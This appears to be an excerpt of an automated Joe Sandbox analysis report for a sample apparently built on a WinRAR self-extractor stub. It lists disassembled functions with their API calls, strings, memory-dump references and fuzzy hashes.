Opcode Fuzzy Hash: fd9574c90769962c46afad244f75befb91bef220af94114677da670d724c04d6
Instruction Fuzzy Hash: F611273614471C7BE2206B249C0AFFF369EEF52750F408025FB02A11A2CB688916C6B8

Function 00708EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00708EC5

Part of subcall function 007084DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958), ref: 007084F4
Part of subcall function 007084DE: GetLastError.KERNEL32(00713958,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958,00713958), ref: 00708506

_free.LIBCMT ref: 00708ED1
_free.LIBCMT ref: 00708EDC
_free.LIBCMT ref: 00708EE7
_free.LIBCMT ref: 00708EF2
_free.LIBCMT ref: 00708EFD
_free.LIBCMT ref: 00708F08
_free.LIBCMT ref: 00708F13
_free.LIBCMT ref: 00708F1E
_free.LIBCMT ref: 00708F2C

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 38f6e143b22100230955f0d632f96d27711b22c7c5f1dd2d8c3b8b2e37be1725
Instruction ID: 16c1b6ed147dd4ea9841cc02d31699ecb355f7af5307cbbb527eb56ed113f569
Opcode Fuzzy Hash: 38f6e143b22100230955f0d632f96d27711b22c7c5f1dd2d8c3b8b2e37be1725
Instruction Fuzzy Hash: 1A11E67650024DFFCB91EF54C846DDA3BA5FF08350B0142A0FA488F6A2DA35DE51DB82

Function 006E2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON

Download Yara Rule

Strings

x%u, xrefs: 006E267A
;%u, xrefs: 006E2497
xc%u, xrefs: 006E26D7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: ;%u$x%u$xc%u
API String ID: 0-2277559157
Opcode ID: 253d55e8511c8cd21d3579d90deab9240ebcb7e24f3c66666dc2d99de0f98300
Instruction ID: 5773d593648b7bb8ae05d1169b5a483aeafac1f6b8af938d28edfee4ea912b88
Opcode Fuzzy Hash: 253d55e8511c8cd21d3579d90deab9240ebcb7e24f3c66666dc2d99de0f98300
Instruction Fuzzy Hash: 18F136706063C25BDF15DF3A88A5BEE779F6F94300F08046DF9858F283DA249949C7A6

Function 006FACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006E130B: GetDlgItem.USER32(00000000,00003021), ref: 006E134F
Part of subcall function 006E130B: SetWindowTextW.USER32(00000000,007135B4), ref: 006E1365

EndDialog.USER32(?,00000001), ref: 006FAD20
SendMessageW.USER32(?,00000080,00000001,?), ref: 006FAD47
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 006FAD60
SetWindowTextW.USER32(?,?), ref: 006FAD71
GetDlgItem.USER32(?,00000065), ref: 006FAD7A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 006FAD8E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 006FADA4

Strings

LICENSEDLG, xrefs: 006FACE4

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: c39e42711285206cfcab5128281003965226f217766e5e4af622b95f48712016
Instruction ID: 0275c6bad0851146610a31441039d094ed78deb059f0f6e99ff4ca588121db2b
Opcode Fuzzy Hash: c39e42711285206cfcab5128281003965226f217766e5e4af622b95f48712016
Instruction Fuzzy Hash: 7A21D671240108BBE2215FB5ED4AF7B3BAEFF47746F018005F708925E1DB6A5912D63A

Function 006E9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 006E9448
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 006E946B
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 006E948A

Part of subcall function 006F17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,006EBB05,00000000,.exe,?,?,00000800,?,?,006F85DF,?), ref: 006F17C2

_swprintf.LIBCMT ref: 006E9526

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

MoveFileW.KERNEL32(?,?), ref: 006E9595
MoveFileW.KERNEL32(?,?), ref: 006E95D5

Strings

rtmp%d, xrefs: 006E950F

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
String ID: rtmp%d
API String ID: 2111052971-3303766350
Opcode ID: 880fe65e3ed015e568b884e06f999916e5c41ea713dd25576c009229bbf1a5cc
Instruction ID: 2bddfdeec3568977cbbe30011a3e8cee8276d2953405562b5ed090eba320d834
Opcode Fuzzy Hash: 880fe65e3ed015e568b884e06f999916e5c41ea713dd25576c009229bbf1a5cc
Instruction Fuzzy Hash: 5341857190239866DF70EB628C449EE737EAF15380F0044EAB549E3151EB349F89CB78

Function 00708FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00720EE8,00703E14,00720EE8,?,?,00703713,00000050,?,00720EE8,00000200), ref: 00708FA9
_free.LIBCMT ref: 00708FDC
_free.LIBCMT ref: 00709004
SetLastError.KERNEL32(00000000,?,00720EE8,00000200), ref: 00709011
SetLastError.KERNEL32(00000000,?,00720EE8,00000200), ref: 0070901D
_abort.LIBCMT ref: 00709023

Strings

Xq, xrefs: 00708FF7

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID: Xq
API String ID: 3160817290-4164291083
Opcode ID: 80f504ec6df660ae3f2a9d0ef46fdec9a1fa00059cd0c3e31e156791fab1ecb0
Instruction ID: 44e283500449c3a464c4ee36c7aa193da6763c6bf3b8334b2778e52a97dea550
Opcode Fuzzy Hash: 80f504ec6df660ae3f2a9d0ef46fdec9a1fa00059cd0c3e31e156791fab1ecb0
Instruction Fuzzy Hash: 10F02831504702EAC79173386C0EB6B29EA9FD1760F258314F594E62D3EF2CD902501A

Function 006F0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 006F0A9D

Part of subcall function 006EACF5: GetVersionExW.KERNEL32(?), ref: 006EAD1A

FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 006F0AC0
FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 006F0AD2
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 006F0AE3
SystemTimeToFileTime.KERNEL32(?,?), ref: 006F0AF3
SystemTimeToFileTime.KERNEL32(?,?), ref: 006F0B03
FileTimeToSystemTime.KERNEL32(?,?), ref: 006F0B3D
__aullrem.LIBCMT ref: 006F0BCB

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 98e934b8199fc9b3e1158b0d37708f2a17c5aaf4d8f28febc31127e03a320307
Instruction ID: 0018c5200a76d221d6e19ab1093c67101db067aa4e74064b0bc080e5518383b9
Opcode Fuzzy Hash: 98e934b8199fc9b3e1158b0d37708f2a17c5aaf4d8f28febc31127e03a320307
Instruction Fuzzy Hash: 91415DB1408309AFD710DF64C8809ABFBF9FF88715F10892EF69692650E739E548CB55

Function 0070EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0070F5A2,?,00000000,?,00000000,00000000), ref: 0070EE6F
__fassign.LIBCMT ref: 0070EEEA
__fassign.LIBCMT ref: 0070EF05
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 0070EF2B
WriteFile.KERNEL32(?,?,00000000,0070F5A2,00000000,?,?,?,?,?,?,?,?,?,0070F5A2,?), ref: 0070EF4A
WriteFile.KERNEL32(?,?,00000001,0070F5A2,00000000,?,?,?,?,?,?,?,?,?,0070F5A2,?), ref: 0070EF83

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e86e77846afcff12f80a96ba7b971457f7135072c91dff9d71a13739d8cd0768
Instruction ID: 6469081f85e21f46b692721ed97978380384be1ff618f0edc90b2b5283350292
Opcode Fuzzy Hash: e86e77846afcff12f80a96ba7b971457f7135072c91dff9d71a13739d8cd0768
Instruction Fuzzy Hash: 3251B4B1A00209DFDB10CFA8D845AEEBBF5FF09310F148A1AE555E72D1E774A981CB64

Function 006FC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 006FC54A
_swprintf.LIBCMT ref: 006FC57E

Part of subcall function 006E400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 006E401D

SetDlgItemTextW.USER32(?,00000066,0072946A), ref: 006FC59E
_wcschr.LIBVCRUNTIME ref: 006FC5D1
EndDialog.USER32(?,00000001), ref: 006FC6B2

Strings

%s%s%u, xrefs: 006FC573

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 39d796ab2b9ff7841355b6405ff433b24699049bc2d2d3ab43a6e380648e7ea3
Instruction ID: b88da604ec811ddb2ec6f69238d1f184d1e23b530bbb3d4086b21f2298563625
Opcode Fuzzy Hash: 39d796ab2b9ff7841355b6405ff433b24699049bc2d2d3ab43a6e380648e7ea3
Instruction Fuzzy Hash: 0A41C5B290065CBADF25DBA4DC45EEA77BEEF08311F0080AAF609D6160E7759BC4CB54

Function 006F8E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 006F8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 006F8F59

Strings

</html>, xrefs: 006F8F0A
<html>, xrefs: 006F8EA7, 006F8EE0
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 006F8EB2
utf-8"></head>, xrefs: 006F8EBD

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 261c699157e19f04bd0a496c2fff29be3e994592ff6a4eeb311e3336eea16fba
Instruction ID: 9a8ef2bcc195f06d28bbdaace832c06ef8230b58ed68e92f7973e1bd5be54155
Opcode Fuzzy Hash: 261c699157e19f04bd0a496c2fff29be3e994592ff6a4eeb311e3336eea16fba
Instruction Fuzzy Hash: 77312772508309AFD724AB349C06FFB779AEF81760F004159F901A72D1EF689A0983A5

Function 006F9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 006F964E
GetWindowRect.USER32(?,00000000), ref: 006F9693
ShowWindow.USER32(?,00000005,00000000), ref: 006F972A
SetWindowTextW.USER32(?,00000000), ref: 006F9732
ShowWindow.USER32(00000000,00000005), ref: 006F9748

Strings

RarHtmlClassName, xrefs: 006F96F4

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: 768edbc5cf53d3b02f9a1062c8610872b05791eb6f583503b5c05d2f40c790c4
Instruction ID: 24285a862da9c924e57e14d14bcd6e81b1065411c989ba524d299278685595ac
Opcode Fuzzy Hash: 768edbc5cf53d3b02f9a1062c8610872b05791eb6f583503b5c05d2f40c790c4
Instruction Fuzzy Hash: BA31E235004308EFDB11AF68DC48B6B7BA9EF49301F01855AFE499A253CB38D855CB75

Function 0070BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0070BF79: _free.LIBCMT ref: 0070BFA2

_free.LIBCMT ref: 0070C003

Part of subcall function 007084DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958), ref: 007084F4
Part of subcall function 007084DE: GetLastError.KERNEL32(00713958,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958,00713958), ref: 00708506

_free.LIBCMT ref: 0070C00E
_free.LIBCMT ref: 0070C019
_free.LIBCMT ref: 0070C06D
_free.LIBCMT ref: 0070C078
_free.LIBCMT ref: 0070C083
_free.LIBCMT ref: 0070C08E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: 032add6949c5794cc456c239ebdfdd4800910179a91075992e15b18fbdc41547
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: E6110071580B45F6D660FBB0CC0BFCBB7DD6F04700F408A55B2996B4D2DBA9FA048A91

Function 007020CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007020C1,006FFB12), ref: 007020D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007020E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007020FF
SetLastError.KERNEL32(00000000,?,007020C1,006FFB12), ref: 00702151

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 07223a7ab68bc834df67ad01a5d96f82e010c4f091e3fae4ab56a5dee1ab826f
Instruction ID: c829c5588d5952efcdd58f866ee75aaa6219bb9c03f756ec98eaef472a8a02ce
Opcode Fuzzy Hash: 07223a7ab68bc834df67ad01a5d96f82e010c4f091e3fae4ab56a5dee1ab826f
Instruction Fuzzy Hash: 5801FC33109315EEF7542BB97CCE9566BC8EB157707318729F610990E2EF9D4C025148

Function 00709029 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00720EE8,00000200,0070895F,007058FE,?,?,?,?,006ED25E,?,03280578,00000063,00000004,006ECFE0,?), ref: 0070902E
_free.LIBCMT ref: 00709063
_free.LIBCMT ref: 0070908A
SetLastError.KERNEL32(00000000,00713958,00000050,00720EE8), ref: 00709097
SetLastError.KERNEL32(00000000,00713958,00000050,00720EE8), ref: 007090A0

Strings

Xq, xrefs: 0070907E

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: ErrorLast$_free
String ID: Xq
API String ID: 3170660625-4164291083
Opcode ID: 8fc7950ea332eefd760e9c6112cdfa2403f0d3b6a91d78f4072ced094a78525d
Instruction ID: e147a4b69c0a352afc31d94d91876a96d18043b4a78c41f57d66fdaa06094a5b
Opcode Fuzzy Hash: 8fc7950ea332eefd760e9c6112cdfa2403f0d3b6a91d78f4072ced094a78525d
Instruction Fuzzy Hash: 14012D72605702EBC33167386C8996B25EE9BC17B17258314F605E62D3DF6DCC014165

Function 006FDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

AcquireSRWLockExclusive, xrefs: 006FDCC9
KERNEL32.DLL, xrefs: 006FDCB4
ReleaseSRWLockExclusive, xrefs: 006FDCD9

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: 2eecea8dfa493b033f53c81c485464c4c7fc894c65ae0ded306b83a1541a4f8c
Instruction ID: 82499058b2f50ce5151e1525f75c1f770b1e20d9f6a632f77c6a633112a13247
Opcode Fuzzy Hash: 2eecea8dfa493b033f53c81c485464c4c7fc894c65ae0ded306b83a1541a4f8c
Instruction Fuzzy Hash: ED01F9716412269B4F205F785CC52F6139BDE42352320917AEB01D3380DB75D881D7E4

Function 00708060 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0070807E

Part of subcall function 007084DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958), ref: 007084F4
Part of subcall function 007084DE: GetLastError.KERNEL32(00713958,?,0070BFA7,00713958,00000000,00713958,00000000,?,0070BFCE,00713958,00000007,00713958,?,0070C3CB,00713958,00713958), ref: 00708506

_free.LIBCMT ref: 00708090
_free.LIBCMT ref: 007080A3
_free.LIBCMT ref: 007080B4
_free.LIBCMT ref: 007080C5

Strings

q, xrefs: 00708074

Memory Dump Source

Source File: 00000000.00000002.1359956435.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.1359928892.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360006527.0000000000713000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.000000000071E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000724000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360023909.0000000000741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1360088419.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_LisectAVT_2403002A_442.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: q
